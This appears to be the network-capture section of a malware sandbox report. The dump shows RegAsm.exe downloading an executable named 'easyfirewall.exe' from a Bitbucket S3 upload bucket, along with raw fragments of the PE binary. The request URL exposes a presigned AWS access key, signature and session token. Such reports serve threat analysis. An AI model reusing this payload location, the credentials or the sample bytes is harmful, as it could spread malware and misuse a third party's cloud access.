                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: c4 0f b7 74 ab d0 4a 21 fc ad e7 fc 29 13 28 11 95 ee ca cf 23 98 c5 84 24 0c 88 81 33 93 c1 c4 5e f4 8f c3 fa c7 14 3c a5 09 ae db 0a 48 95 7a e8 70 12 f7 28 a7 bd 5a 15 dd 65 94 7f 03 27 f9 39 63 7c cc ef 29 39 e2 e7 50 8d 32 4c 60 ac 4c 0f 70 84 c4 45 bc 21 bf bb ec f3 d9 65 be df 80 59 2c f4 72 5f b4 e6 d5 9f 1f d3 7f 7e 07 ae 7e a6 ae 36 51 c4 fc 80 07 53 fb 23 9d ae 3a 87 4a d9 0b 02 49 e4 8a 01 b7 f5 48 94 9e 4b 71 74 49 ac c3 c3 38 0e a6 75 98 2e f4 52 3d b3 e8 eb 80 30 1e e0 1c 1b df 0d 6f 92 e9 8c 0e cd 53 7b cf 39 eb 9c b7 b3 c1 e7 53 73 d1 42 e9 1d f1 6b 1c 22 04 6f 10 a4 a6 8d 4e ff 02 18 0e ac cf ef 29 c2 20 63 d3 4a 15 3f cd 51 71 39 6b 3f 8a 5e 53 dd 40 b1 44 6a 5e 82 70 c2 af e4 af 90 e6 78 34 ba a7 6b 42 38 64 d0 41 e3 2d 2a 1f 6f 12 41
                                                                                                                                                                                                                                        Data Ascii: tJ!)(#$3^<Hzp(Ze'9c|)9P2L`LpE!eY,r_~~6QS#:JIHKqtI8u.R=0oS{9SsBk"oN) cJ?Qq9k?^S@Dj^px4kB8dA-*oA
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: 46 a4 73 b6 d2 37 64 bb 6e f0 75 f3 9f e1 42 b3 83 d9 29 7d d0 44 bf 95 1c 24 7b c4 96 8c 38 52 f0 d7 62 61 8e 5b 80 c7 2c 92 0e 64 f9 b4 c2 f4 6d ab 9e ad a0 a2 27 d3 bb 9b 40 8a ba 79 82 94 50 0c 6e ab 07 f0 69 f4 f7 ab 60 ed 16 7e d3 4d f8 f1 34 32 c1 07 9d 09 dc e9 e1 05 d1 fa cb bc f6 17 8f 4a 53 f7 93 ab d7 6c 95 13 76 d5 b9 a0 2e 7f c3 40 b0 2d b9 1d f4 f2 3a d0 ce ce 3e b3 20 4f 84 76 bd cd c1 76 ce 0a 37 32 bc 2a c7 3a dd e1 96 12 ac a0 36 3e 0f 2b e3 e9 20 a9 e3 6c f6 e1 e6 9a 3e d4 f6 c9 59 1c 1d c4 aa d4 79 6e fb de 55 8e 49 53 6f 4a bc ec 13 48 3f 67 44 dd c0 23 26 61 b2 61 90 8c 12 5d 1e 2e df 3a a7 22 76 65 0d 75 03 df 60 4a 4c 60 1b f2 88 66 82 9e 7d fe 5c 4d 54 57 2f ba 82 c5 a8 f1 65 b5 ee a9 55 e4 9d 83 c1 22 0b 26 3c 56 93 14 cd 8f 9e
                                                                                                                                                                                                                                        Data Ascii: Fs7dnuB)}D${8Rba[,dm'@yPni`~M42JSlv.@-:> Ovv72*:6>+ l>YynUISoJH?gD#&aa].:"veu`JL`f}\MTW/eU"&<V
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: ed 0c d9 ee 13 d4 76 b0 bd 1b 6b 0f 65 6e ee 8b 1d f0 20 b4 7d fe b8 22 b6 7e a1 2e 24 18 8b 77 c8 cb 0c 6b f9 2d 54 15 fb ce d4 b3 b8 0d 70 0a 1e 88 2e 47 9d 18 9a 29 9d 62 9b a1 73 c7 6e 96 c0 83 25 eb e8 69 09 1e a6 cf ad 60 c6 93 49 99 69 5c 6b 61 66 70 4d 18 b8 39 43 c6 b1 97 59 81 4b 83 80 5c c7 7d f3 90 e7 ba 5b 84 f5 f9 b4 b3 1b 3a bd 00 75 c1 08 43 ea 76 6d db c4 cb 10 62 77 be 95 3b e9 f6 32 ff fe e9 ae 0c 53 e0 41 32 50 ff 27 0e a3 9a be 6e 5c db 5f a8 a5 cf 48 4c d3 63 0d 89 0b 51 9e 18 61 91 5b 67 72 3c 05 f2 11 c8 b7 30 4c ff dc 09 63 26 60 33 db 4a 2d c0 73 25 6e 0b ad 5a 9e a7 7f d0 6a 4e 75 a3 21 b2 00 0a 4c 56 c9 af 0c 45 5d c7 af 0e 6c 63 ec a5 79 b3 b9 4a d2 c7 93 c7 07 1d f4 ff 02 47 0b 55 da d3 a0 a9 fc e0 cd 15 f6 bf c4 23 8c d0 02
                                                                                                                                                                                                                                        Data Ascii: vken }"~.$wk-Tp.G)bsn%i`Ii\kafpM9CYK\}[:uCvmbw;2SA2P'n\_HLcQa[gr<0Lc&`3J-s%nZjNu!LVE]lcyJGU#
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: 1b 16 ef e4 fb 69 9b 90 d5 20 e4 8e 4d d2 65 02 87 48 e3 a3 d2 a1 bb 28 22 e1 d8 fb ec 67 23 ad 26 a3 e1 f3 c2 83 ab 88 49 fb be eb 76 98 5a ca 5b c9 12 af d3 10 cb a8 d0 4f fa a1 db 9d e8 15 79 95 7d 95 87 50 36 f1 55 b9 11 00 5f b9 a1 db 3d 51 6c 10 6c 1b 8c f2 02 5f 7b 33 78 09 3e fc d9 75 08 01 62 ee c0 8b 33 bc 0c e2 33 60 2b 4a c4 74 78 36 77 a3 72 53 cd 92 a5 a6 3d da 03 a4 22 be 20 df fd f9 ad 18 6e 15 ae 97 49 f5 d4 a1 65 c4 d8 70 b5 92 ff d6 ef 4f 30 8b 93 a3 5e 09 3d e7 55 54 06 a1 50 71 27 a6 36 e0 79 47 df a0 5f 20 1d f4 ac d1 1e 7a f7 c4 1b 81 09 7c dd 26 d6 81 26 a5 d5 4c 1e cd 71 ef 4a 33 a7 6d 3d fe 0f 6a 83 09 39 4f 3b 4b b8 fc 48 92 6e 3a 34 b2 63 3c b5 5c a8 b1 8f 44 87 09 0f cb d0 ec 20 d6 56 04 58 08 7b 75 cc fd fc bd 1a b1 78 60 20
                                                                                                                                                                                                                                        Data Ascii: i MeH("g#&IvZ[Oy}P6U_=Qll_{3x>ub33`+Jtx6wrS=" nIepO0^=UTPq'6yG_ z|&&LqJ3m=j9O;KHn:4c<\D VX{ux`
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: 39 63 44 fc 39 55 42 e9 1f fb a3 f7 47 6e 00 5b 91 ab ef c4 4e aa b1 d2 3c 7e 14 59 e4 e3 32 e1 7b 8c 42 a4 26 cb bc cd de 76 45 ee e9 fc ce cc e8 1d 6c 6b 51 0a ca b9 b2 dc 68 3d c0 43 78 be 7b e6 02 6e ce a9 ac 9e 54 66 80 99 73 82 73 e4 1c 63 91 84 0d 68 dc 0d e6 8e 16 a3 0a 2e 67 7f 34 80 0b 32 f8 f8 bd d7 9f 62 18 67 12 d4 63 16 ac 8a 0f 41 f2 8b 2e 91 ff 57 ee ab 1b c8 57 e6 65 8a 3b 0f 38 2c 9c 7d f6 8c 35 75 90 34 2b 34 8f 0b 54 2f 09 17 a5 a4 cf df cb b2 76 23 02 ff e3 7d 60 0b 8c c5 70 11 df ba 3c f7 ad 2b b7 21 09 95 4d d1 0e 8c 44 12 ce f7 0a 69 30 98 01 1a 90 9e d3 f3 83 6f 8e 82 22 bf ec 8c c2 8f e3 88 40 65 f5 6a a7 5c 26 a8 28 69 4e f3 b3 78 70 4d df 17 f7 8b 63 6b be e3 a0 03 38 6a 09 d2 6e 48 88 11 33 61 26 4b 74 c0 87 33 1e 2c 10 b5 61
                                                                                                                                                                                                                                        Data Ascii: 9cD9UBGn[N<~Y2{B&vElkQh=Cx{nTfssch.g42bgcA.WWe;8,}5u4+4T/v#}`p<+!MDi0o"@ej\&(iNxpMck8jnH3a&Kt3,a
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: cb e1 e5 7b 46 31 f1 5d 84 0a 1a 85 27 5e 55 f9 cf 93 6f 6f 1a f0 f0 81 da 75 60 95 3b e3 f6 58 73 ef 1c 03 64 49 bd ef a9 ff bf a6 f4 98 5d b9 44 76 64 be ca b0 99 33 9a 08 6a c7 4f 41 d9 8e 31 b6 97 82 37 bb be f5 8e 92 ed 91 64 20 5e e9 9e 55 9f 75 73 e8 62 e0 fc 7a b8 b6 95 5b 25 97 06 78 8a c2 67 a8 ef 97 96 48 ab 8f b4 62 97 22 10 a0 e4 d5 50 7b 8e c8 17 3b 44 7f f9 18 38 51 f9 40 73 96 af dd cd 7c 56 d5 80 f2 cb ad 70 be 6c 0e d8 e9 58 4c 2e 73 c1 77 32 9b 23 82 55 07 96 50 ac c1 76 77 26 d8 d6 1e c6 9d 94 50 56 16 d7 1b e7 77 c5 2f b2 4e e5 d2 a0 6a 9c 60 ba 93 99 50 a6 93 ac 39 de 6e 8d 9c b2 c2 7f 7a 74 ee 15 10 e1 3f 68 08 e4 3b 8c 45 f3 cb 06 55 ea 9a 00 af ba 26 57 39 03 13 11 4b 73 60 a8 82 ab b4 bd 61 e2 93 c5 17 57 33 29 5a f2 4d 09 bf d3
                                                                                                                                                                                                                                        Data Ascii: {F1]'^Uoou`;XsdI]Dvd3jOA17d ^Uusbz[%xgHb"P{;D8Q@s|VplXL.sw2#UPvw&PVw/Nj`P9nzt?h;EU&W9Ks`aW3)ZM
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: 02 0a de 83 ee 67 ae e4 3b 19 3d d3 45 04 65 b6 fb 16 0d c5 c9 8c 42 10 1b 50 59 34 6b d3 32 80 8c bf 6a 89 66 45 9e 84 a6 64 ca 23 5f 8c 55 e9 f8 f4 c0 34 ab a6 3e d6 83 73 d8 32 d4 66 08 04 a9 cd a2 f3 29 bc 0c a9 ce 9b 04 97 9c 30 4e 92 ac 47 0d d7 c6 e4 3c e4 47 20 b0 4b 72 48 63 18 6d 85 9b 1e b2 3f da b2 c2 0e db 63 4a 3d b4 3b f5 5b bc bf e2 40 da 85 d5 52 11 8f fd 52 c2 54 7e cc 60 c8 f0 5b 9f 07 cf 71 fb 6c c7 c8 54 29 0c fe 5c c2 a6 97 43 cb 5f ac 00 9b 9a 9a 93 d9 f3 e6 14 48 c9 ce 1b bf c1 5a e8 d7 4e d9 e7 96 67 2c dc 32 b3 00 d1 1a fa 43 46 22 77 98 df 41 26 7b 4b 2b a2 7b 75 8d 4a 6b 35 1a 2a 92 c3 8f 12 f2 0f 6a 27 ee b6 21 b8 0d ac 94 16 e6 66 98 47 58 57 6f e4 03 cc c7 79 72 b6 87 24 16 d7 5b 90 28 dd 3d d4 ae a9 8d a5 da 4d ee f6 3f 66
                                                                                                                                                                                                                                        Data Ascii: g;=EeBPY4k2jfEd#_U4>s2f)0NG<G KrHcm?cJ=;[@RRT~`[qlT)\C_HZNg,2CF"wA&{K+{uJk5*j'!fGXWoyr$[(=M?f
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: 95 20 3d 81 93 d0 1b ff ac 30 6c 1f 98 b1 a7 ce 9b a6 49 32 80 aa f2 9c 7b 84 83 14 4d 83 07 97 8c 86 86 3e cd 74 54 98 6d 3d 29 ce 1b 6a f0 47 a4 4d ed cf 07 d5 aa 83 ca d4 13 2d b4 bf 6d e9 9e c1 18 40 10 5a 9b b7 cf a7 6e 50 4d 70 fc 70 4c a3 17 15 c6 bc f5 1c 36 cb 2c 34 72 3d 01 7f df 11 4f 31 6d e2 b2 ba 21 cf 42 d7 89 80 c9 59 89 42 29 55 12 50 fb 3b 2f 27 11 20 9a ef da b4 b4 84 08 f2 e0 3a 46 d7 70 cb 59 05 f0 41 8c 1d 76 37 8c 04 46 24 e8 10 99 15 4a 0b a9 9d 1e 94 6c 40 63 f6 42 e3 3a 96 8b d6 54 32 65 f9 42 ed 9c 4d 15 16 ed db a8 25 41 a1 f8 a6 d8 9c dc cd 84 77 57 2b d4 60 f7 84 f0 ae 86 c1 68 06 44 4f f3 c4 db 67 39 95 65 2a f5 13 82 da 8b 02 e3 f9 0d cd 3e b5 42 65 f0 40 0f 6e eb c6 59 6f 7a b9 9d 81 3a d5 65 e2 4d e3 42 59 6f e5 9b c9 af
                                                                                                                                                                                                                                        Data Ascii: =0lI2{M>tTm=)jGM-m@ZnPMppL6,4r=O1m!BYB)UP;/' :FpYAv7F$Jl@cB:T2eBM%AwW+`hDOg9e*>Be@nYoz:eMBYo
                                                                                                                                                                                                                                        2024-09-21 12:48:10 UTC8000INData Raw: 6a 5f a6 25 2a 96 02 47 8c ed 89 de 3c 72 ba 69 63 3e 89 9c 33 85 90 22 ae 3e 60 f6 2b a3 53 5a d0 c5 fa d1 f0 cd ac f9 5e 88 71 34 ed 98 55 2a 0a 2c a9 1b e3 86 38 8f 9a 9d fe 83 2b ea 4e ef 74 6d 9e ad 6a 56 56 9d a3 bd 9e 1d bd 6b 0e 56 69 df b3 79 72 ef 08 83 af 0e 4d b0 1e bc 7a 1c a3 6b 8b 48 9c 87 7b 38 c4 91 d4 d7 f8 39 da c8 1b b0 ca 8d 12 a1 e8 47 79 1e 50 83 3d f5 2a c2 a8 f8 92 44 6e 03 b1 3c ff a8 a5 2f 81 23 7a 5a d0 10 61 80 81 a4 02 11 62 db 15 3c 18 30 e7 2a 62 70 29 88 32 eb 08 0a d3 4e 2c f7 83 f8 e2 ff 7f a2 d2 ad bd b7 13 a5 8d 99 00 b3 e3 ed a2 b2 2f ac 59 1e a1 61 7c 01 71 de 1d 8c ad 5a 86 60 0b ef 6b 73 68 77 8c 41 68 6e 08 2d 65 04 32 bd db 16 52 8c a9 40 bb 49 97 35 3a ce 5e e7 69 e6 da c1 4c fd ea 71 4b 4c 78 c8 1c f2 7b ee bc
                                                                                                                                                                                                                                        Data Ascii: j_%*G<ric>3">`+SZ^q4U*,8+NtmjVVkViyrMzkH{89GyP=*Dn</#zZab<0*bp)2N,/Ya|qZ`kshwAhn-e2R@I5:^iLqKLx{


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        5192.168.2.94973054.231.236.2014437504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:48:11 UTC1361OUTGET /bbfbfb0f-4597-4ff3-b025-124f61baf271/downloads/7f30c6a5-e68f-46b2-82dc-be29f7fa498f/easyfirewall.exe?response-content-disposition=attachment%3B%20filename%3D%22easyfirewall.exe%22&AWSAccessKeyId=ASIA6KOSE3BNALNDSNXI&Signature=7Oy%2Bjzmz%2FlXC%2FL1QASQlZvKc%2Bl8%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEFUaCXVzLWVhc3QtMSJGMEQCIDE7ySbs3yUKutqnoMVZe2lBMy%2FzLUXK7oA9sVz3qh3fAiB7uhzCaJ9QAf8KACE%2BI3nJiDzFAW0ja%2FG7sHqOwjkBVyqwAgiO%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMsG28MyjVkhRoivDZKoQC2Nc%2FjnX7Tbhrr0Gh8ipoFpgeJ%2BpNqndZT4i%2BOmSK6LFExTbeLlFeC3aOopynxOWTtXGkMfcvWjgryJmsRfTly0%2F%2F3B3Vx63gKJ4o3QZZExWB5ecbpWMs%2Bc48sEJ8nIrd4YZibjmyiqvqkjxZkJTMVKCLLCM7ZO2hRDaB22a7lR1E7CpB7AAoyh%2FiTlDsxWuHKuDLvqMqx8UNPVEvpzj3sV2M4kl9sn7TBWI5yWl%2FZymPomH2fXbA6yTcmqlPq%2FrDycduU0I01uI8v91zRz7QDYqWlTquKfBYFo%2FoWPY7toSWKATL7%2FwXiHqODNH93aSs63LBq39Xw41mTOonKYbRosm22PQwjf66twY6ngHaj1zb%2FhGT4dlAnMdSXHAGlvyvWd50O5Ui%2FXnBPKGu108w8WdcK%2BdyQpVVrnszsaYmewsJVta0GbBLEkWzuG6hpH2CVZ%2FFLyb67eupBy2hlY65kjfqM4In7bmglhQvy [TRUNCATED]
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2024-09-21 12:48:11 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        x-amz-id-2: /iNcgadtHKwlHDzfy3aqr/LuVHHG5coArFw6ESXXz70mWf8u8q7LkHsLtOhHLty37oR3uDTq4NU=
                                                                                                                                                                                                                                        x-amz-request-id: 4H6ERT31HY8ZP46C
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:12 GMT
                                                                                                                                                                                                                                        Last-Modified: Fri, 20 Sep 2024 17:25:15 GMT
                                                                                                                                                                                                                                        ETag: "4eacb750002490284888e5adceae7ca7-3"
                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                        x-amz-version-id: IVhJvkxy9Iqiznh75XtLIn3UyKmrbEmY
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="easyfirewall.exe"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                                                        Content-Length: 22487040
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:48:11 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 f6 68 00 00 1c 57 01 00 2c 09 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 c0 60 01 00 04 00 00 85 2a 57 01 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$hW,@`*W`
                                                                                                                                                                                                                                        2024-09-21 12:48:11 UTC475INData Raw: 7f 93 a0 00 00 00 f3 44 0f 7f 9b b0 00 00 00 b8 00 00 00 00 66 4c 0f 6e f8 48 83 c4 10 5d c3 cc 49 3b 66 10 76 18 55 48 89 e5 48 83 ec 18 b9 2c 01 00 00 e8 c8 f1 ff ff 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 73 6f 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c7 cc cc cc cc cc cc cc 49 3b 66 10 0f 86 30 01 00 00 55 48 89 e5 f2 0f 10 05 1a 9d f8 00 f2 0f 11 05 22 53 59 01 48 8b 05 fb f1 6d 00 83 3d 04 58 59 01 00 74 13 e8 8d 8e 06 00 49 89 03 48 8b 0d 3b a5 50 01 49 89 4b 08 48 89 05 30 a5 50 01 48 8b 05 e1 f1 6d 00 83 3d da 57 59 01 00 74 13 e8 63 8e 06 00 49 89 03 48 8b 0d 19 a5 50 01 49 89 4b 08 48 89 05 0e a5 50 01 48 8b 05 c7 f1 6d 00 83 3d b0 57 59 01 00 74 13 e8 39 8e 06 00 49 89 03 48 8b 0d f7 a4 50 01 49 89 4b 08 48 89 05 ec a4 50 01 48 8b 05
                                                                                                                                                                                                                                        Data Ascii: DfLnH]I;fvUHH,H]HD$H\$soHD$H\$I;f0UH"SYHm=XYtIH;PIKH0PHm=WYtcIHPIKHPHm=WYt9IHPIKHPH
                                                                                                                                                                                                                                        2024-09-21 12:48:11 UTC16384INData Raw: 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 d3 6d 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c7 cc cc cc cc cc cc cc 49 3b 66 10 76 18 55 48 89 e5 48 83 ec 18 b9 02 00 00 00 e8 88 8b 06 00 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 93 6d 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c7 cc cc cc cc cc cc cc 49 3b 66 10 76 18 55 48 89 e5 48 83 ec 18 b9 10 00 00 00 e8 48 8b 06 00 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 53 6d 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c7 cc cc cc cc cc cc cc 55 48 89 e5 48 83 ec 18 48 83 c2 08 48 8b 0a e8 0c 8b 06 00 48 83 c4 18 5d c3 cc cc cc cc cc cc 49 3b 66 10 76 1d 55 48 89 e5 48 83 ec 18 48 8b 10 48 8b 48 08 48 89 d0 e8 a3 60 00 00 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 ee 6c 06 00 48 8b 44 24 08 48 8b 5c
                                                                                                                                                                                                                                        Data Ascii: ]HD$H\$mHD$H\$I;fvUHHH]HD$H\$mHD$H\$I;fvUHHHH]HD$H\$SmHD$H\$UHHHHH]I;fvUHHHHHH`H]HD$H\$lHD$H\
                                                                                                                                                                                                                                        2024-09-21 12:48:11 UTC1024INData Raw: 48 89 4c 24 18 e8 db 33 03 00 48 8d 05 ff ed a7 00 bb 08 00 00 00 e8 4a 3c 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 bb 3a 03 00 e8 f6 35 03 00 e8 11 34 03 00 48 8b 44 24 30 48 8b 88 c0 00 00 00 48 89 4c 24 18 e8 9b 33 03 00 48 8d 05 c7 ed a7 00 bb 08 00 00 00 e8 0a 3c 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 7b 3a 03 00 e8 b6 35 03 00 e8 d1 33 03 00 48 8b 44 24 30 48 8b 88 c8 00 00 00 48 89 4c 24 18 e8 5b 33 03 00 48 8d 05 8f ed a7 00 bb 08 00 00 00 e8 ca 3b 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 3b 3a 03 00 e8 76 35 03 00 e8 91 33 03 00 48 8b 44 24 30 48 8b 88 d0 00 00 00 48 89 4c 24 18 e8 1b 33 03 00 48 8d 05 57 ed a7 00 bb 08 00 00 00 e8 8a 3b 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 fb 39 03 00 e8 36 35 03 00 e8 51 33 03 00 48 8b 44 24 30 48 8b 88 d8 00 00
                                                                                                                                                                                                                                        Data Ascii: HL$3HJ<HD$D:54HD$0HHL$3H<HD$D{:53HD$0HHL$[3H;HD$D;:v53HD$0HHL$3HW;HD$D965Q3HD$0H
                                                                                                                                                                                                                                        2024-09-21 12:48:11 UTC16384INData Raw: 0f 1f 44 00 00 45 38 d1 74 c1 eb 8b 49 29 d8 49 8d 48 ff 48 89 ce 48 f7 d9 48 c1 f9 3f 48 8d 7b 01 48 21 cf 48 8d 04 3a 48 89 f3 48 83 c4 10 5d c3 48 89 c8 48 89 d9 e8 a9 4c 06 00 48 8d 05 61 76 a9 00 bb 16 00 00 00 e8 f8 14 03 00 90 48 89 44 24 08 48 89 5c 24 10 e8 88 29 06 00 48 8b 44 24 08 48 8b 5c 24 10 e9 f9 fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 8d 64 24 80 4d 3b 66 10 0f 86 5f 03 00 00 55 48 89 e5 48 81 ec f8 00 00 00 48 89 84 24 08 01 00 00 48 8b 08 48 85 c9 75 0e bb 09 00 00 00 48 8d 0d ae f4 a7 00 eb 18 48 89 c8 0f 1f 44 00 00 e8 bb 91 05 00 48 89 c1 48 8b 84 24 08 01 00 00 48 89 4c 24 78 48 89 5c 24 50 48 8b 50 10 48 89 d0 e8 9a 91 05 00 48 8b 8c 24 08 01 00 00 48 8b 51 08 48 85 d2 0f 84 b9 02 00
                                                                                                                                                                                                                                        Data Ascii: DE8tI)IHHHH?H{H!H:HH]HHLHavHD$H\$)HD$H\$Ld$M;f_UHHH$HHuHHDHH$HL$xH\$PHPHH$HQH
                                                                                                                                                                                                                                        2024-09-21 12:48:11 UTC1024INData Raw: ce 01 f0 48 0f b1 33 40 0f 94 c6 40 84 f6 75 6b 48 8b 74 24 20 31 c0 48 89 44 24 18 48 39 c8 7c 32 48 8d 79 01 48 39 f8 7d 69 48 8d 05 1c be af 00 48 89 04 24 e8 8b e8 05 00 45 0f 57 ff 4c 8b 35 c0 cf 58 01 65 4d 8b 36 4d 8b 36 48 8b 44 24 18 eb 88 c7 04 24 1e 00 00 00 e8 06 04 06 00 45 0f 57 ff 4c 8b 35 9b cf 58 01 65 4d 8b 36 4d 8b 36 48 8b 44 24 18 e9 60 ff ff ff 48 8d 44 24 38 0f 1f 44 00 00 e8 db 4d 02 00 48 83 c4 58 5d c3 48 89 f8 48 8b 7a 30 49 89 f0 48 83 e6 fe 48 89 b7 38 02 00 00 48 8b 72 30 48 83 ce 01 48 89 c7 4c 89 c0 f0 48 0f b1 33 40 0f 94 c6 40 84 f6 75 11 48 8b 33 0f ba e6 00 72 c6 48 89 f8 e9 09 ff ff ff 41 0f ba e0 00 73 22 48 c7 c0 ff ff ff ff 0f 1f 44 00 00 e8 9b 9b 02 00 48 8b 4c 24 10 48 8b 54 24 28 48 8b 5c 24 30 31 ff 48 89 f8 e9
                                                                                                                                                                                                                                        Data Ascii: H3@@ukHt$ 1HD$H9|2HyH9}iHH$EWL5XeM6M6HD$$EWL5XeM6M6HD$`HD$8DMHX]HHz0IHH8Hr0HHLH3@@uH3rHAs"HDHL$HT$(H\$01H
                                                                                                                                                                                                                                        2024-09-21 12:48:12 UTC16384INData Raw: 8b 36 4d 8b 36 48 8b 4c 24 18 48 8b 5c 24 38 48 8b 13 48 85 d2 74 b6 eb 9e 48 8d 05 c5 b3 a8 00 bb 13 00 00 00 e8 1b d1 02 00 90 48 89 44 24 08 e8 b0 e5 05 00 48 8b 44 24 08 e9 c6 fe ff ff cc cc cc cc cc cc 55 48 89 e5 48 83 ec 38 49 8b 4e 30 48 89 4c 24 20 48 8b 4c 24 20 48 89 c2 31 c0 f0 48 0f b1 0a 0f 94 c1 84 c9 74 6b 4c 89 74 24 30 48 85 db 7d 2d 49 8b 4e 30 c6 81 e5 00 00 00 01 48 8b 0d a5 56 6d 00 48 83 39 00 0f 85 16 02 00 00 48 c7 c0 ff ff ff ff e8 e7 97 02 00 e9 bc 01 00 00 48 89 54 24 28 48 89 5c 24 50 e8 73 21 06 00 45 0f 57 ff 4c 8b 35 48 cb 58 01 65 4d 8b 36 4d 8b 36 48 8b 04 24 48 8b 5c 24 50 48 01 d8 48 89 44 24 18 eb 28 48 83 3a 01 75 0b b8 01 00 00 00 48 83 c4 38 5d c3 48 8d 05 c2 a4 aa 00 bb 1e 00 00 00 e8 4c d0 02 00 48 89 d0 48 89 cb
                                                                                                                                                                                                                                        Data Ascii: 6M6HL$H\$8HHtHHD$HD$UHH8IN0HL$ HL$ H1HtkLt$0H}-IN0HVmH9HHT$(H\$Ps!EWL5HXeM6M6H$H\$PHHD$(H:uH8]HLHH
                                                                                                                                                                                                                                        2024-09-21 12:48:12 UTC1024INData Raw: 08 48 89 7c 24 38 48 83 fa ff 0f 84 2b 01 00 00 44 0f b6 53 08 41 f6 c2 08 0f 85 1c 01 00 00 4c 89 44 24 30 0f ba e1 02 73 07 b9 01 00 00 00 eb 43 48 8b 4e 30 48 8b 51 18 48 8b 0a 4c 89 e0 48 89 c3 ff d1 48 8b 54 24 20 48 8b 5c 24 50 48 8b 74 24 40 48 8b 7c 24 38 4c 8b 44 24 30 44 0f b6 4c 24 1f 4c 8b 64 24 48 4c 8b 7c 24 58 89 c1 48 8b 44 24 70 84 c9 75 37 0f b6 48 4a ff c9 49 89 d2 48 d3 ea 47 0f b6 1c 38 41 83 e3 01 80 f9 40 4d 19 ed 49 21 d5 4d 39 eb 0f 84 9f 00 00 00 4c 89 d2 48 8b 7c 24 28 4d 89 fa e9 db fe ff ff 48 8b 56 48 48 8b 0a 8b 7b 0c 4c 89 e0 48 89 fb ff d1 48 8b 4c 24 70 0f b6 71 4a 48 89 ca 89 f1 bf 01 00 00 00 48 d3 e7 48 8d 4f ff 48 21 c8 48 8b 4c 24 20 66 90 48 39 c1 74 25 48 89 d0 48 89 ca 48 8b 5c 24 50 48 8b 74 24 40 48 8b 7c 24 28
                                                                                                                                                                                                                                        Data Ascii: H|$8H+DSALD$0sCHN0HQHLHHT$ H\$PHt$@H|$8LD$0DL$Ld$HL|$XHD$pu7HJIHG8A@MI!M9LH|$(MHVHH{LHHL$pqJHHHOH!HL$ fH9t%HHH\$PHt$@H|$(
